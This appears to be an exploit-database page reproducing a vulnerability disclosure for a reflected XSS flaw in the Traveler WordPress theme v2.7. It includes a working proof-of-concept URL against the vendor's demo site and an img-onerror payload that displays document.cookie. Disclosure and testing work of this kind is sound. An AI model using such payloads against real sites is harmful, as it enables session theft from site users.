Traveler - Travel Booking WordPress Theme v2.7 Reflected XSS Injection

CVE	Category	Price	Severity
CVE-2020-35863	CWE-79	$500	High

Author	Risk	Exploitation Type	Date
Unknown	High	Remote	2019-04-28

CPE
cpe:cpe:/a:wordpress:traveler_travel_booking_theme:2.7

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019040262

Below is a copy:

Traveler - Travel Booking WordPress Theme v2.7 Reflected XSS Injection

[*] :: Title: Traveler - Travel Booking WordPress Theme v2.7 Reflected XSS Injection
[*] :: Author: QUIXSS
[*] :: Date: 2019-04-28
[*] :: Software: Traveler - Travel Booking WordPress Theme v2.7
  
[?] :: Technical Details & Description:
# Weak security measures like no input fields data filtering has been discovered in the Traveler - Travel Booking WordPress Theme. Current version of this WordPress premium theme is 2.7.

[?] :: Demo Website:
# https://themeforest.net/item/traveler-traveltourbooking-wordpress-theme/10822683
# Frontend: https://remap.travelerwp.com/

[!] :: Special Note:
# 5.822 Sales

[!] :: For developers:
# Disabling any data changes on a demo websites doesn't make your applications more secure. It's good for business and sales but you are simply double-crossing your clients.

[+] :: PoC [Links]:
# https://remap.travelerwp.com/?s=%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E

[+] :: PoC [Reflected XSS Injection]:
# For Reflected XSS Injection use default WordPress search on the demo website https://remap.travelerwp.com/?s=[payload]
# Sample payload: "><img src=x onerror=alert(document.cookie)>

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum